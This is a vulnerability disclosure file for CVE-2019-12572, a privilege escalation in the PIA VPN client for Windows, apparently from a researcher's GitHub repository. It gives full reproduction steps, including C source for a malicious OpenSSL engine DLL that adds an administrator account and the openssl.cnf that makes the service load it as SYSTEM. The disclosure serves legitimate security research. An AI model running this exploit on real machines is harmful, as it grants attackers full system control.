security-research/vulnerabilities/PIA/CVE-2019-12572.txt at master · mirchr/security-research · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine

Author: Rich Mirch

CVE: CVE-2019-12572

Vendor Advisory: N/A

Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.

On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts
to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By
default on Windows systems, authenticated users can create directories under c:\.
A low privileged user can create an openssl.cnf configuration file to load a
malicious OpenSSL engine library resulting in the arbitrary code execution as
SYSTEM when the service starts.


CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C
Base: 7.8
Temporal: 7.8


Test Environment

OS: Windows 10 Pro 10.0.17763
PIA Version: 1.0.2 (build 02363)


Steps to reproduce

Note: All steps are executed using a low privileged account.


1) Create the c:\etc\ssl directory

mkdir c:\etc\ssl


2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.


/* Cross Compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
            system("cmd /c net user woot insertpasswordhere /add");
            system("cmd /c net localgroup administrators woot /add");
            break;
        case DLL_THREAD_ATTACH:
         // Do thread-specific initialization.
            break;
        case DLL_THREAD_DETACH:
         // Do thread-specific cleanup.
            break;
        case DLL_PROCESS_DETACH:
         // Perform any necessary cleanup.
            break;
    }
    return TRUE;  // Successful DLL_PROCESS_ATTACH.
}


3) Copy the malicious woot.dll file into the c:\etc\ssl folder.

copy woot.dll c:\etc\ssl


4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.

openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0


5) Reboot the system because a low privilege user does not have permission to
restart the service.


6) After the reboot has completed, login and open a command shell. At this point
the "woot" administrator account will exist.


net user woot


Timeline:

2019-02-16: Reported to vendor
2019-02-16: Vendor confirmed vulnerability
2019-06-04: Vendor released fix in v1.2.1
2019-06-10: Public disclosure